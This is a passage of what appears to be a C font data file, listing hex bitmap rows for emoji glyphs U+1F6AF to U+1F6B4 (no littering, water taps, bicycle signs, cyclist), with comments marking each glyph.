0xf8, 0x0, 0xe3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x70, 0xff, 0xff, 0xff, 0xf8, 0xff,
0xfe, 0x0, 0x38, 0x7f, 0xff, 0xff, 0xfc, 0x7f,
0xff, 0x0, 0x1e, 0x3f, 0xff, 0xf3, 0xfe, 0x3f,
0x9f, 0x80, 0xf, 0xf, 0xff, 0xf9, 0xff, 0xff,
0x8f, 0xc3, 0x7, 0x87, 0xff, 0xfc, 0xff, 0xff,
0xcf, 0xe1, 0x83, 0xe7, 0xff, 0xfe, 0x3f, 0xff,
0xe7, 0xf0, 0xc1, 0xff, 0xff, 0xff, 0x9e, 0x3f,
0xf3, 0xf8, 0x60, 0xff, 0xff, 0xff, 0xcf, 0x1f,
0xf1, 0xfc, 0x30, 0x7f, 0xff, 0xff, 0xe7, 0xff,
0xf9, 0xfe, 0x18, 0x3f, 0xff, 0xff, 0xf1, 0xff,
0xfc, 0xff, 0xc, 0x1f, 0xff, 0xff, 0xfc, 0xff,
0xfe, 0x7f, 0x86, 0xf, 0xff, 0xff, 0xfe, 0x7f,
0x1f, 0x3f, 0xc3, 0x7, 0xff, 0xff, 0xff, 0x3f,
0x8f, 0x3f, 0xe1, 0x83, 0xff, 0xff, 0xff, 0x8f,
0xc7, 0x9f, 0xf0, 0xc1, 0xff, 0xff, 0xff, 0xe7,
0xff, 0xcf, 0xf8, 0x60, 0xff, 0xff, 0xff, 0xf3,
0xff, 0xe7, 0xfc, 0x30, 0x7f, 0xff, 0xff, 0xf9,
0xff, 0xe3, 0xfe, 0x18, 0x3f, 0xff, 0xff, 0xfc,
0xff, 0xf3, 0xff, 0xc, 0x1f, 0xff, 0xff, 0xff,
0x3f, 0xf9, 0xff, 0x86, 0xf, 0xff, 0xff, 0xff,
0x9f, 0xfc, 0xff, 0xc3, 0x7, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x7f, 0xe1, 0x83, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x7f, 0xf0, 0xc1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfb,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F6AF "🚯" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x7, 0x80, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0xf, 0xe0, 0x1,
0xe0, 0x0, 0x1f, 0x0, 0x0, 0x7, 0xf8, 0x0,
0x70, 0x0, 0x1f, 0xc0, 0x0, 0x7, 0xfc, 0x0,
0x1c, 0x0, 0x1c, 0xf0, 0x0, 0x3, 0xfe, 0x0,
0x7, 0x0, 0x1e, 0x3c, 0x0, 0x0, 0xff, 0x0,
0x3, 0xc0, 0xe, 0x7, 0x0, 0x0, 0x7f, 0x0,
0x0, 0xe0, 0xe, 0x1, 0xc0, 0x0, 0xf, 0x0,
0x0, 0x38, 0x7, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x1c, 0x0, 0x3, 0xf0,
0x0, 0x7, 0x3, 0x80, 0x7, 0x0, 0x7, 0xfc,
0x0, 0x3, 0x83, 0x80, 0x1, 0xc0, 0x7, 0xff,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x70, 0xf, 0xff,
0xc0, 0x0, 0x71, 0xc0, 0x0, 0x1c, 0xf, 0xff,
0xe0, 0x0, 0x3c, 0xe0, 0x0, 0x7, 0xf, 0xff,
0xf8, 0x0, 0xe, 0x70, 0x0, 0x1, 0xcf, 0x7f,
0xfc, 0x0, 0x7, 0x38, 0x0, 0x7, 0xff, 0x3f,
0xfe, 0x0, 0x3, 0xb8, 0x0, 0x7, 0xff, 0x1f,
0xfb, 0x80, 0x0, 0xfc, 0x0, 0x1, 0xff, 0xf,
0xfd, 0xc0, 0x0, 0x7e, 0x0, 0x0, 0x1, 0xc7,
0xfe, 0x70, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x73,
0xff, 0x38, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x1d,
0xff, 0x9c, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x7,
0xff, 0xc7, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x1,
0xff, 0xe3, 0x80, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x7f, 0xf0, 0xe0, 0x1, 0xf8, 0x0, 0x70, 0x0,
0x1f, 0xf8, 0x70, 0x0, 0xfc, 0x0, 0x38, 0x0,
0xf, 0xfc, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x7, 0xfe, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x3, 0xff, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x1, 0xff, 0x80, 0x0, 0x1c, 0xe0, 0x38, 0x0,
0x0, 0xf7, 0xc0, 0x0, 0xe, 0x70, 0x1c, 0x0,
0x0, 0x79, 0xe0, 0x0, 0x7, 0x3c, 0xe, 0x0,
0x0, 0x3c, 0xf0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x1e, 0x7c, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0xf, 0x3f, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x7, 0x9f, 0xc0, 0x1, 0xc0, 0xe0, 0xe,
0x0, 0x3, 0xcf, 0x70, 0x0, 0xe0, 0x38, 0x7,
0x0, 0x1, 0xe7, 0x9c, 0x0, 0xe0, 0x1c, 0x3,
0x80, 0x0, 0xf3, 0xc7, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x79, 0xe1, 0xc0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x3c, 0xf0, 0x70, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x1e, 0x78, 0x1c, 0x38, 0x0, 0x38,
0x0, 0x0, 0xf, 0x3c, 0x7, 0x38, 0x0, 0xe,
0x0, 0x0, 0x7, 0x9e, 0x1, 0xf8, 0x0, 0x7,
0x80, 0x0, 0x1, 0x86, 0x0, 0x78, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F6B0 "🚰" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x3f, 0x87, 0xf3, 0xff,
0xff, 0xff, 0xff, 0xff, 0x8f, 0xc3, 0xf8, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xf8, 0xfc, 0x3f, 0x8f,
0xff, 0xff, 0xff, 0xff, 0xfc, 0xfe, 0x1f, 0xcf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x81, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3f,
0xe1, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0xf,
0xf0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3,
0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x1,
0xfc, 0x3f, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x3, 0xff, 0xff, 0xff, 0x81, 0xfc, 0x0,
0xf, 0xe1, 0xff, 0xff, 0xff, 0xc1, 0xff, 0x0,
0x7, 0xf0, 0xff, 0xff, 0xff, 0xc1, 0xff, 0x80,
0x3, 0xf8, 0x7f, 0xff, 0xff, 0xe1, 0xff, 0xe0,
0x3, 0xfc, 0x3f, 0xff, 0xff, 0xf0, 0xff, 0xf8,
0x7, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x7f, 0xff,
0x8f, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xcf, 0xff, 0xff,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xf3, 0xff, 0xff,
0xbf, 0xff, 0xff, 0xff, 0xff, 0xf9, 0xff, 0xff,
0x9f, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xbf, 0xff,
0xf3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xcf, 0xff,
0xf3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe7, 0xff,
0xf9, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf3, 0xff,
0xfc, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf9, 0xff,
0xfe, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x7f,
0xff, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfb,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F6B1 "🚱" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x1e, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0xc, 0xf, 0x3, 0x1,
0xe0, 0x0, 0x1f, 0x0, 0x6, 0x7, 0x81, 0x80,
0x70, 0x0, 0x1d, 0xc0, 0x3, 0xff, 0xff, 0xc0,
0x1c, 0x0, 0x1c, 0x70, 0x1, 0xff, 0xff, 0xe0,
0x7, 0x0, 0x1e, 0x1c, 0x0, 0xff, 0xff, 0xf0,
0x3, 0xc0, 0xe, 0x7, 0x0, 0x60, 0x78, 0x18,
0x0, 0xe0, 0xe, 0x1, 0xc0, 0x30, 0x3c, 0xc,
0x0, 0x38, 0x7, 0x0, 0x70, 0x0, 0x1e, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x1c, 0x0, 0xf, 0x0,
0x0, 0x7, 0x3, 0x80, 0x7, 0x0, 0xf, 0xc0,
0x3, 0x3, 0x83, 0x80, 0x1, 0xc0, 0x1f, 0xf8,
0x7, 0x80, 0xe1, 0xc0, 0x0, 0x70, 0x1f, 0xfe,
0x3, 0xc0, 0x71, 0xc0, 0x0, 0x1c, 0xf, 0xff,
0x1, 0xe0, 0x3c, 0xe0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xf0, 0xe, 0x70, 0x0, 0xf, 0xff, 0xff,
0xff, 0xf8, 0x7, 0x38, 0x0, 0xf, 0xff, 0xff,
0xff, 0xfc, 0x3, 0xb8, 0x0, 0xf, 0xff, 0xff,
0xff, 0xfe, 0x0, 0xfc, 0x0, 0xf, 0xc7, 0xff,
0xf8, 0xf, 0x0, 0x7e, 0x0, 0x7, 0xc1, 0xff,
0xfc, 0x7, 0x80, 0x3f, 0x0, 0x3, 0xc0, 0x7f,
0xfe, 0x3, 0xc0, 0x1f, 0x80, 0x3, 0xe0, 0x1f,
0xfe, 0x1, 0xe0, 0xf, 0xc0, 0x1, 0xe0, 0x7,
0xfe, 0x0, 0x0, 0x7, 0xe0, 0x0, 0xf0, 0x1,
0xdc, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x78, 0x0,
0x70, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x0, 0x3d, 0xc0, 0xe0, 0x3,
0x80, 0x1c, 0x0, 0x0, 0x1c, 0xe0, 0x3f, 0xff,
0x80, 0x7, 0x0, 0x0, 0xe, 0x70, 0x18, 0x0,
0xc0, 0x1, 0xc0, 0x0, 0x7, 0x3c, 0xc, 0x0,
0x60, 0x0, 0x78, 0x0, 0x7, 0x8e, 0x7, 0x0,
0x70, 0x0, 0x1e, 0x0, 0x3, 0x87, 0x1, 0x80,
0x30, 0x0, 0x7, 0x80, 0x1, 0xc1, 0xc0, 0xc0,
0x18, 0x0, 0x1, 0xe0, 0x1, 0xc0, 0xe0, 0x7f,
0xfc, 0x0, 0x0, 0x78, 0x0, 0xe0, 0x38, 0x3f,
0xfe, 0x0, 0x0, 0x1e, 0x0, 0xe0, 0x1c, 0xf,
0xfe, 0x0, 0x0, 0x7, 0x80, 0x70, 0x7, 0x7,
0xff, 0x0, 0x0, 0x1, 0xe0, 0x70, 0x3, 0xc3,
0xff, 0x80, 0x0, 0x0, 0x78, 0x78, 0x0, 0xe1,
0xff, 0xc0, 0x0, 0x0, 0x1e, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x7, 0xb8, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F6B2 "🚲" */
0x0, 0x1f, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x67, 0x0, 0x1f,
0xff, 0x80, 0x0, 0x0, 0x3c, 0x0, 0x73, 0x80,
0x1f, 0xff, 0xe0, 0x0, 0x0, 0x1c, 0x0, 0x31,
0x80, 0x7, 0xff, 0xe0, 0x0, 0x0, 0xe, 0x0,
0x18, 0xc0, 0x0, 0xff, 0xe0, 0x0, 0x0, 0x7,
0x0, 0x1c, 0xe0, 0x0, 0x37, 0xc0, 0x0, 0x0,
0x3, 0xc0, 0xc, 0x60, 0x0, 0x18, 0xc0, 0x0,
0x0, 0x0, 0xf8, 0x6, 0x30, 0x0, 0xc, 0x60,
0x0, 0x0, 0x0, 0x3c, 0x7, 0x3f, 0xff, 0xfc,
0x70, 0x0, 0x0, 0x0, 0x0, 0x3, 0x1f, 0xff,
0xfe, 0x30, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80,
0x0, 0x0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc0, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0,
0x0, 0x0, 0x63, 0xff, 0xff, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x31, 0xff, 0xff, 0xc4, 0x60,
0x0, 0x0, 0x0, 0x0, 0x38, 0xe0, 0x0, 0x62,
0x38, 0x0, 0x0, 0x0, 0x0, 0x18, 0x38, 0x0,
0x71, 0x8c, 0x0, 0x0, 0x0, 0x0, 0xc, 0x8e,
0x0, 0x31, 0xc7, 0x0, 0x0, 0x0, 0x7, 0xfe,
0x63, 0x80, 0x18, 0xf1, 0xff, 0x80, 0x0, 0xf,
0xfe, 0x38, 0xe0, 0x1c, 0x78, 0xff, 0xf8, 0x0,
0x1f, 0xff, 0x1e, 0x38, 0xc, 0x6e, 0x3f, 0xfe,
0x0, 0x1f, 0xff, 0x9f, 0xe, 0x6, 0x33, 0xf,
0xff, 0xc0, 0x1f, 0xcd, 0x8f, 0xc3, 0x87, 0x19,
0xc7, 0xf, 0xf0, 0x1f, 0x86, 0xc7, 0xf0, 0xe3,
0x1d, 0xe1, 0x81, 0xfc, 0x1f, 0x3, 0xe7, 0xfc,
0x39, 0x8d, 0xf8, 0xe1, 0xbe, 0xf, 0xc1, 0xf3,
0xf7, 0xf, 0xc7, 0xfc, 0x31, 0x8f, 0x8f, 0x60,
0xf1, 0xbd, 0xc3, 0xc7, 0xf3, 0x1c, 0xc3, 0xe7,
0x9c, 0x71, 0xde, 0x70, 0xe3, 0xf9, 0x86, 0xc0,
0xf7, 0x87, 0x38, 0xe7, 0x9c, 0x3f, 0xf8, 0x63,
0xe0, 0x7b, 0xc1, 0xfc, 0xe3, 0xc7, 0x3f, 0xfc,
0x33, 0xe0, 0x3f, 0xc0, 0x7f, 0xe0, 0xe1, 0xfd,
0xff, 0xff, 0xf0, 0xff, 0xe0, 0x18, 0xe0, 0x70,
0x7c, 0x7f, 0xff, 0x9f, 0xe7, 0xf0, 0x18, 0x70,
0x38, 0x1c, 0x1f, 0xff, 0x87, 0x83, 0xff, 0xfc,
0x3f, 0xfc, 0x6, 0xc, 0x0, 0xc3, 0x1, 0xfc,
0x2, 0x18, 0xe, 0x3, 0xee, 0x0, 0x71, 0x80,
0xfe, 0x1, 0xf8, 0x7, 0x1, 0xf7, 0xff, 0xff,
0xf0, 0x7f, 0x81, 0xfe, 0x7, 0x80, 0x7f, 0xff,
0xff, 0x9c, 0x7f, 0xc1, 0x99, 0x83, 0xc0, 0x3e,
0x3c, 0x6, 0xc3, 0xbc, 0xf1, 0x8c, 0x63, 0xc0,
0x38, 0x1f, 0x6, 0x20, 0x7e, 0x79, 0x86, 0x1d,
0xe1, 0xf8, 0x7, 0x82, 0x18, 0x1f, 0x1f, 0x83,
0x7, 0xe0, 0xfc, 0x3, 0xe3, 0xc, 0x1f, 0xf,
0x81, 0x81, 0xf0, 0x7e, 0x0, 0xfb, 0x6, 0x1f,
0x3, 0xf0, 0xc1, 0xf0, 0x3f, 0x0, 0x3f, 0x81,
0x1f, 0x80, 0xfe, 0x67, 0xf0, 0x0, 0x0, 0xf,
0xe0, 0xff, 0x80, 0x3f, 0xff, 0xf0, 0x0, 0x0,
0x3, 0xff, 0xff, 0x80, 0xf, 0xff, 0xf0, 0x0,
0x0, 0x0, 0xff, 0xff, 0x0, 0x1, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x1f, 0xff, 0x0, 0x0, 0x3f,
0xc0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0, 0x0,
/* U+1F6B3 "🚳" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1d, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x78, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x7, 0x80, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x1, 0xe0, 0x3c, 0x0, 0x0,
0x0, 0x38, 0x7, 0x0, 0x78, 0x7e, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0xe, 0x70, 0x3, 0xf8,
0x0, 0x7, 0x3, 0x80, 0x3, 0xb0, 0x1, 0xfc,
0x0, 0x3, 0x83, 0x80, 0x0, 0xf8, 0x0, 0x18,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x3c, 0x0, 0x18,
0x0, 0x0, 0x71, 0xc0, 0x0, 0xf, 0x0, 0xc,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x3, 0xff, 0xff,
0x80, 0x0, 0xe, 0x70, 0x0, 0x1, 0xff, 0xff,
0xe0, 0x0, 0x7, 0x38, 0x0, 0x0, 0xf8, 0x6,
0x30, 0x0, 0x3, 0xb8, 0x0, 0x0, 0xce, 0x3,
0x18, 0x0, 0x0, 0xfc, 0x0, 0x1f, 0xe3, 0x81,
0x87, 0xf0, 0x0, 0x7e, 0x0, 0x3f, 0xf0, 0xe1,
0x87, 0xfe, 0x0, 0x3f, 0x0, 0x78, 0x3e, 0x38,
0xcf, 0x83, 0xc0, 0x1f, 0x80, 0x70, 0x1b, 0x8e,
0xce, 0xc0, 0x70, 0xf, 0xc0, 0x30, 0x18, 0xc3,
0xe6, 0x30, 0x18, 0x7, 0xe0, 0x30, 0xc, 0x30,
0xe6, 0x18, 0x6, 0x3, 0xf0, 0x18, 0x6, 0x18,
0x3b, 0xc, 0x3, 0x1, 0xf8, 0x18, 0x6, 0x6,
0xf, 0x2, 0x0, 0xc0, 0xfc, 0xc, 0x3, 0x3,
0x3, 0x81, 0x80, 0x60, 0x7e, 0x6, 0x3, 0x1,
0x80, 0xe0, 0xc0, 0x30, 0x3f, 0x3, 0x0, 0x80,
0xc0, 0x7f, 0xe0, 0x18, 0x3d, 0xc1, 0x80, 0x0,
0x60, 0x3f, 0xf8, 0xc, 0x1c, 0xe0, 0xc0, 0x0,
0x30, 0x1b, 0x80, 0x6, 0xe, 0x70, 0x30, 0x0,
0x30, 0x6, 0xe0, 0x6, 0x7, 0x3c, 0x18, 0x0,
0x18, 0x3, 0x38, 0x3, 0x7, 0x8e, 0x6, 0x0,
0x18, 0x0, 0xce, 0x3, 0x3, 0x87, 0x3, 0x80,
0x1c, 0x0, 0x73, 0x83, 0x81, 0xc1, 0xc0, 0xf0,
0x3c, 0x0, 0x1e, 0xe7, 0x81, 0xc0, 0xe0, 0x1f,
0xf8, 0x0, 0x3, 0xff, 0x0, 0xe0, 0x38, 0x3,
0xf0, 0x0, 0x0, 0x7e, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x3, 0xb8, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F6B4 "🚴" */
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xc,
